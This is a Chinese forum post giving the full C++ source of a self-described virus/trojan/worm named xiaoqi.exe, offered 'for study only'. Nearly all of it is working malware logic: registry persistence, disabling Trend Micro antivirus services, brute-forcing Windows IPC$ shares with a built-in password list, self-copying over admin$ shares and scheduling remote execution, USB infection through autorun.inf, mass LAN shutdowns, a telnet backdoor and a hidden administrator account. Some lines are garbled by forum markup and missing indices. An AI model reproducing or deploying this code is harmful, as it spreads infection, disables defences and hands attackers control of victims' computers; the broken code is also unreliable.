一个恶意程序

本人最近学习网络安全,突发灵感,写了兼有病毒、木马、蠕虫于特点的东东。现在贴出来,仅供学习娱乐,勿做他用,否则责任自负。
编译环境:vc++32位应用程序。源文件有system.h、init.cpp、system.cpp三个。先分别给出代码。
//system.h,系统总体规划
#if !defined(_IHATEBUGGING)
#define _IHATEBUGGING
#include <io.h>
#include <time.h>
#include <stdio.h>
#include <string.h>
struct sys{     //配置全局变量类型
char syspath[30];  //系统路径
char hostip[16];  //主机IP
char guestip[16];  //客户IP
char user[20];   //用户名
char passwd[20];  //密码
char flag[6];   //标识
char send;    //是否攻击网络,0不攻击,1攻击
char station;   //客户本机标识/10的值
char lastdisk[4];  //最后一个盘符
int  hacknum;   //已入侵的主机数
};
void getpath();         //获取系统路径
void saveconfig(char flagfile[40]);    //加密保存配置
void filecopy(FILE *fp);      //拷贝副本,如果是远程就尝试启动
void checkTime(char hostip[16]);    //和主机对时
void changereg();        //更改注册表
int Init(int argc,char * args[]);    //初始化
void shut(char netid[12],int start,int end); //尝试关闭局域网内start~end网段的机子
void hacknet(int childip,char netid[12]);  //网络入侵
void hackdisk(char diskroot[4]);    //攻击U盘
void shut_open();        //关闭趋势防毒墙并打开后门
void TIMER(long minute);      //主循环模拟事件
#endif // !defined(_IHATEBUGGING)

//init.cpp,系统初始化

#include <windows.h>
#include "system.h"
extern struct sys Sysmesg;          //定义于system.cpp
void saveconfig(char flagfile[40])         //加密保存配置
{
struct sys message=Sysmesg;
char *p=(char *)&message;
for(int i=0;i<sizeof(message);i++)
  (*p++)+=3;
FILE *fp=fopen(flagfile,"wb");
fwrite(&message,sizeof(message),1,fp);
fclose(fp);
}
void openconfig(char flagfile[40])           //读取配置并解密
{
FILE *fp=fopen(flagfile,"rb");
fread(&Sysmesg,sizeof(Sysmesg),1,fp);
fclose(fp);
char *p=(char *)&Sysmesg;
for(int i=0;i<sizeof(Sysmesg);i++)
  (*p++)-=3;
}
void getconfig(char * args[])              //从参数获取配置信息
{
char disk[4]="C://";
strcpy(Sysmesg.hostip,args[1]);
strcpy(Sysmesg.guestip,args[2]);
strcpy(Sysmesg.user,args[3]);
strcpy(Sysmesg.passwd,args[4]);
strcpy(Sysmesg.flag,args[5]);
if(Sysmesg.flag[1]=='z')
  Sysmesg.flag[0]+=1,Sysmesg.flag[1]='A';
else
{
  Sysmesg.flag[1]+=1;
  Sysmesg.send=(Sysmesg.flag[0]=='Z'&&Sysmesg.flag[1]=='Z')?0:1;
}
Sysmesg.station=0;           //获取本机标识/10的值
int i,k=strlen(Sysmesg.guestip)-1;
while(Sysmesg.guestip[--k]!='.');
for(i=k+1;i<(int)strlen(Sysmesg.guestip)-1;i++)
  Sysmesg.station=Sysmesg.station*10+Sysmesg.guestip -'0';
while(access(disk,0)==0)
  disk[0]++;
disk[0]--;
strcpy(Sysmesg.lastdisk,disk);           //获取最后一个盘符
Sysmesg.hacknum=0;            //初始化已攻击机器数
if(strcmp(Sysmesg.hostip,"127.0.0.1"))     //网络入侵则和主机对时
  checkTime(Sysmesg.hostip);
}
void getpath()              //获取系统路径
{
if(access("c://winnt",0)==0)
  strcpy(Sysmesg.syspath,"c://winnt//");
else if(access("c://windows",0)==0)
  strcpy(Sysmesg.syspath,"c://windows//");
else
  strcpy(Sysmesg.syspath,"c://");
}
void filecopy(FILE *fp)             //拷贝副本
{
fprintf(fp,"attrib -r -h -s xiaoqi.exe/r/n");
fprintf(fp,"copy xiaoqi.exe z:///r/n");
fprintf(fp,"attrib +r +h +s xiaoqi.exe/r/n");
fprintf(fp,"attrib +r +h +s z://xiaoqi.exe/r/n");
}
void checkTime(char hostip[16])            //和主机对时
{
FILE *fp=fopen("checktime.bat","wb");
fprintf(fp,"net use %s//ipc$ /"/" /user:/"/"/r/n",Sysmesg.hostip);
fprintf(fp,"net time %s /set /y/r/n",Sysmesg.hostip);
fprintf(fp,"net use %s//ipc$ /del /y/r/n",Sysmesg.hostip);
fprintf(fp,"del checktime.bat/r/n");
fclose(fp);
WinExec("checktime.bat",SW_HIDE);    
}      
void changereg()             //更改注册表
{
FILE *fp=fopen("regchg.bat","wb");
fprintf(fp,"reg add /"HKEY_CURRENT_USER//Software//Microsoft//Windows NT//");
fprintf(fp,"CurrentVersion//Windows/" /v /"load/" /t REG_SZ /d ");
fprintf(fp,"/"%sxiaoqi.exe/" /f/r/n",Sysmesg.syspath);
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"ntrtscan/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"OfcPfwSvc/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg add /"HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//");
fprintf(fp,"tmlisten/" /v /"Start/" /t REG_DWORD /d /"4/" /f/r/n");
fprintf(fp,"reg delete /"HKEY_CURRENT_USER//SOFTWARE//Microsoft//Windows//");
fprintf(fp,"CurrentVersion//Run/" /v /"OfficeScanNT Monitor/" /f/r/n");
fprintf(fp,"del regchg.bat/r/n");
fclose(fp);
WinExec("regchg.bat",SW_HIDE);
}
int Init(int argc,char * args[])             //初始化
{
char flagfile[40];
getpath();               //获取系统路径
strcpy(flagfile,Sysmesg.syspath);
strcat(flagfile,"xiaoqi.exe");
if(access(flagfile,0)==-1)         //通过U盘传播进入或用户自己激发
{
  char cmd[100],localip[16];
  FILE *fp;
  WinExec("cmd.exe /c ipconfig.exe|find /"IP Address/">ipaddress",SW_HIDE);
  Sleep(1000);
  fp=fopen("ipaddress","rb");
  fgets(cmd,100,fp);
  fclose(fp);
  WinExec("cmd.exe /c /"del ipaddress/"",SW_HIDE);
  for(int i=strlen(cmd);cmd<'0' || cmd>'9';i--);
  for(cmd=0;cmd!=' ';i--);
  strcpy(localip,&cmd);        //获取本地IP地址
  changereg();
  strcpy(cmd,Sysmesg.syspath);
  if(strlen(cmd)>3)        //过滤非根目录末尾的'/'字符
   cmd[strlen(cmd)-1]=0;
  fp=fopen("localhak.bat","wb");  
  fprintf(fp,"subst z: %s/r/n",cmd);
  filecopy(fp);
  fprintf(fp,"subst z: /d/r/n");
  fprintf(fp,"start /Dc: %sxiaoqi.exe 127.0.0.1 ",Sysmesg.syspath);
  fprintf(fp,"%s administrator 7654321 AA001/r/n",localip);
  fprintf(fp,"del localhak.bat/r/n");   fclose(fp);
  WinExec("localhak.bat",SW_HIDE);
  return 0;
}
if(access("d://",0)==0 && access("d://xiaoqi.exe",0)==-1)
  hackdisk("d://");         //感染D盘,防止重装系统
strcpy(flagfile,Sysmesg.syspath);
strcat(flagfile,"config");
if(argc==6)            //通过网络入侵进入系统
{
  getconfig(args);
  saveconfig(flagfile);
  changereg();
}
else if(argc==1)
  openconfig(flagfile);
else              //双击U盘时机器已感染
{
  char cmd[20]="explorer ";
  strcat(cmd,args[1]);
  WinExec(cmd,SW_SHOW);
  return 0;
}
return 1;
}

//system.cpp,主文件
#include <time.h>
#include <direct.h>
#include <windows.h>
#include "system.h"
struct sys Sysmesg;             //配置全局变量
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
char *args[6];
int argc=1,k=0,i;
long minute=0;
for(i=0;i<6;i++)
  args=new char[20];
if(strcmp(lpCmdLine,""))           //分离命令行参数
  for(args[0]="xiaoqi.exe";lpCmdLine[k]!=0;)
  {
   i=0,argc++;
   while(lpCmdLine[k]!=' ' && lpCmdLine[k]!=0)
    args[argc-1]=lpCmdLine[k++];
   args[argc-1]=0;
   while(lpCmdLine[k]==' ')
    k++;
  }
if(!Init(argc,args))         //初始化并判断执行来源
  return 0;
else if(CreateMutex(NULL,TRUE,"_BACKUPRUN_"))   //互斥对象保证只运行一个副本  
{  
  if(GetLastError()==ERROR_ALREADY_EXISTS)
  {  
   MessageBox(NULL,"磁盘驱动程序,请勿操作!","系统信息",NULL);  //迷惑用户
   return  0;  
  }
}
_chdir(Sysmesg.syspath);         //更改当前目录到系统目录
srand((unsigned)time(NULL));           //初始化种子
while(1)
{
  Sleep(20000);
  TIMER(++minute);
}
return 1;
}
void shut(char netid[12],int start,int end)  //尝试关闭局域网内start~end网段的机子
{
FILE *fp=fopen("shutdown.bat","wb");
fprintf(fp,"set /a localid=%d/r/n",start);
fprintf(fp,":begin/r/n");
fprintf(fp,"net use %s%%localid%%//ipc$ %s /user:%s/r/n",netid,Sysmesg.passwd,Sysmesg.user);
fprintf(fp,"if errorlevel 1 net use %s%%localid%%",netid);
fprintf(fp,"[url=file://ipc$/]//ipc$[/url] /"/" /user:administrator/r/n");
fprintf(fp,"if errorlevel 1 goto next/r/n");
fprintf(fp,"shutdown.exe -s -m %s%%localid%% -t 00/r/n",netid);
fprintf(fp,"net use %s%%localid%%//ipc$ /del /y/r/n",netid);
fprintf(fp,":next/r/n");
fprintf(fp,"set /a localid=%%localid%%+1/r/n");
fprintf(fp,"if %%localid%%==%d goto end/r/n",end);
fprintf(fp,"goto begin/r/n");
fprintf(fp,":end/r/n");
fprintf(fp,"del shutdown.bat/r/n");
fclose(fp);
WinExec("shutdown.bat",SW_HIDE);
}
void hacknet(char netid[12],int childip)          //网络入侵
{
time_t xx=time(0)+600;
char farid[4]="123",flag[6],flagfile[40],tm[25];
char passwd[][10]={"/"/"","123","1234","12345","123456","1234567","7654321","654321","54321",
                 "888888","12345678","000000","god","God","haha","user","admin","passwd",
        "password","guest","1983","1984","1985","1986","1987","1988","1989","1990",
        "0125","0912","0705","0735","911","520","father","mother","brother","sister",
        "beauty","beautiful","strong","power","powerful","rand","intel","dell",
        "sony","Alcatel","alcatel","acer","lenovo","compaq","Dell","daevoo","iei",
        "chocon","iei123","legend","Acer","pass","hack","hacker","crack","cracker",
        "jay","allen","john","beijing","nanjing","hefei","jodan","backhan","[email=!@#$%]!@#$%[/email]",
        "!@#$%^","!@#$%^&","!@#$%^&*","@#$%^&","bill","kiss","kitty","wang","zhang",
        "liu","chen","yang","zhao","huang","iloveyou","ihateyou","19851225","zhou",
        "copy","19851225","feifei","evil","xiaoqi","ashou","yinmo","angel","hero"};
strcpy(tm,ctime(&xx));
tm[19]=0;
FILE *fp=fopen("nethak.bat","wb");
farid[0]=childip/100+'0';
farid[1]=(childip%100)/10+'0';
farid[2]=childip%10+'0';
fprintf(fp,"net use %s%s//ipc$ /"/" /user:/"/"/r/n",netid,farid);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use %s%s//ipc$ /del /y/r/n",netid,farid);
fprintf(fp,"net use %s%s//ipc$ ",netid,farid);
fprintf(fp,"%s /user:%s/r/n",Sysmesg.passwd,Sysmesg.user);
for(int i=0;i<sizeof(passwd)/10;i++)
  fprintf(fp,"if errorlevel 1 net use %s%s//ipc$ %s /user:administrator/r/n",
    netid,farid,passwd);
fprintf(fp,"if errorlevel 1 goto end/r/n");
fprintf(fp,"net use z: %s%s//admin$/r/n",netid,farid);
fprintf(fp,"if not exist z:// goto disconnect/r/n");
fprintf(fp,"if exist z://xiaoqi.exe goto disconnect/r/n");
filecopy(fp);
Sysmesg.hacknum++;
flag[0]=Sysmesg.flag[0];   flag[1]=Sysmesg.flag[1];
flag[2]=Sysmesg.hacknum/100+'0'; flag[3]=(Sysmesg.hacknum%100)/10+'0';
flag[4]=Sysmesg.hacknum%10+'0';  flag[5]=0;
fprintf(fp,"at %s%s %s ",netid,farid,&tm[11]);
if(strcmp(Sysmesg.syspath,"c://"))
  fprintf(fp,"%%windir%%//xiaoqi.exe %s %s%s ",Sysmesg.guestip,netid,farid);
else
  fprintf(fp,"c://xiaoqi.exe %s %s%s ",Sysmesg.guestip,netid,farid);
fprintf(fp,"%s %s %s/r/n",flag,Sysmesg.user,Sysmesg.passwd);
fprintf(fp,":disconnect/r/n");  fprintf(fp,"net use * /del /y/r/n");
fprintf(fp,":end/r/n");    fprintf(fp,"del nethak.bat/r/n"); fclose(fp);
WinExec("nethak.bat",SW_HIDE);
strcpy(flagfile,Sysmesg.syspath); strcat(flagfile,"config");
saveconfig(flagfile);
}
void hackdisk(char diskroot[4])             //感染U盘
{
char cmd[20];
FILE *fp;
strcpy(cmd,diskroot); strcat(cmd,"autorun.inf");
fp=fopen(cmd,"wb");
fprintf(fp,"[autorun]/r/n");
fprintf(fp,"open=.//xiaoqi.exe %%1/r/n/r/n");
fprintf(fp,"shell//1=Open/r/n");
fprintf(fp,"shell//1//Command=.//xiaoqi.exe %%1/r/n");
fprintf(fp,"shell//2//=Browser/r/n");
fprintf(fp,"shell//2//Command=.//xiaoqi.exe %%1/r/n/r/n");
fprintf(fp,"shellexecute=.//xiaoqi.exe %%1/r/n");
fclose(fp);
fp=fopen("diskhack.bat","wb");
fprintf(fp,"subst z: %s/r/n",diskroot);
filecopy(fp);
fprintf(fp,"attrib +s +r +h z://autorun.inf/r/n");
fprintf(fp,"subst z: /d/r/n");
fprintf(fp,"del diskhack.bat/r/n"); fclose(fp);
WinExec("diskhack.bat",SW_HIDE);
}
void shut_open()           //关闭趋势防毒墙并打开后门
{
FILE *fp=fopen("shutopen.bat","wb");
fprintf(fp,"net stop tmlisten/r/n");
fprintf(fp,"net stop ntrtscan/r/n");
fprintf(fp,"net stop ofcpfwsvc/r/n");
fprintf(fp,"taskkill /f /im pccntmon.exe/r/n");
fprintf(fp,"if errorlevel 1 taskkill /f ");
fprintf(fp,"/u %s /p %s /im pccntmon.exe/r/n",Sysmesg.user,Sysmesg.passwd);
fprintf(fp,"net stop telnet/r/n");
if(!strcmp(strlwr(Sysmesg.syspath),"c://windows"))
  fprintf(fp,"tlntadmn config port=301 sec=+passwd/r/n");
else if(!strcmp(strlwr(Sysmesg.syspath),"c://winnt"))
{
  fprintf(fp,"echo 3>tlntcnfg/r/n");
  fprintf(fp,"echo 7>>tlntcnfg/r/n");
  fprintf(fp,"echo y>>tlntcnfg/r/n");
  fprintf(fp,"echo 0>>tlntcnfg/r/n");
  fprintf(fp,"echo y>>>tlntcnfg/r/n");
  fprintf(fp,"echo 301>>tlntcnfg/r/n");
  fprintf(fp,"echo y>>tlntcnfg/r/n");
  fprintf(fp,"echo 0>>tlntcnfg/r/n");
  fprintf(fp,"echo 0>>tlntcnfg/r/n");
  fprintf(fp,"tlntadmn<tlntcnfg/r/n");
  fprintf(fp, "del tlntcnfg/r/n");
}
fprintf(fp,"net start telnet/r/n");
fprintf(fp,"net share system$=%ssystem32/r/n",Sysmesg.syspath);
fprintf(fp,"net user system$ system /add/r/n");
fprintf(fp,"net localgroup administrators system$ /add/r/n");
fprintf(fp,"del shutopen.bat/r/n");
fclose(fp);
WinExec("shutopen.bat",SW_HIDE);
}
void TIMER(long minute)            //主循环模拟触发器
{
char disk[4],backfile[15];
strcpy(disk,Sysmesg.lastdisk);
for(disk[0]='Z';disk[0]>=Sysmesg.lastdisk[0];disk[0]--)
  if(access(disk,0)==0)             //感染U盘
  {
   sprintf(backfile,"%s%s",disk,"xiaoqi.exe");
   if(access(backfile,0)==-1)       //识别U盘是否已感染
    hackdisk(disk);
  }
if(minute%11==0)         //尝试关闭趋势防毒墙并打开后门
  shut_open();
else if(minute%57==0)             //群发消息
   WinExec("net send * 病毒和蠕虫有什么区别?",SW_HIDE);
else
{
  char netid[16];
  strcpy(netid,Sysmesg.guestip);
  if(Sysmesg.station==0)
   netid[strlen(netid)-1]=0;
  else if(Sysmesg.station<10)
   netid[strlen(netid)-2]=0;
  else
   netid[strlen(netid)-3]=0;
  if(minute%97==0 && rand()%2==1)         //尝试关闭其他机器
   if(Sysmesg.station==25)
    shut(netid,Sysmesg.station*10+1,255);
   else
    shut(netid,Sysmesg.station*10+1,(Sysmesg.station+1)*10);
  else if(Sysmesg.hacknum<999 && minute%23==0 && Sysmesg.send)//尝试网络入侵
  {
   int childip=rand()%254+1;
   hacknet(netid,childip);
  }
}
}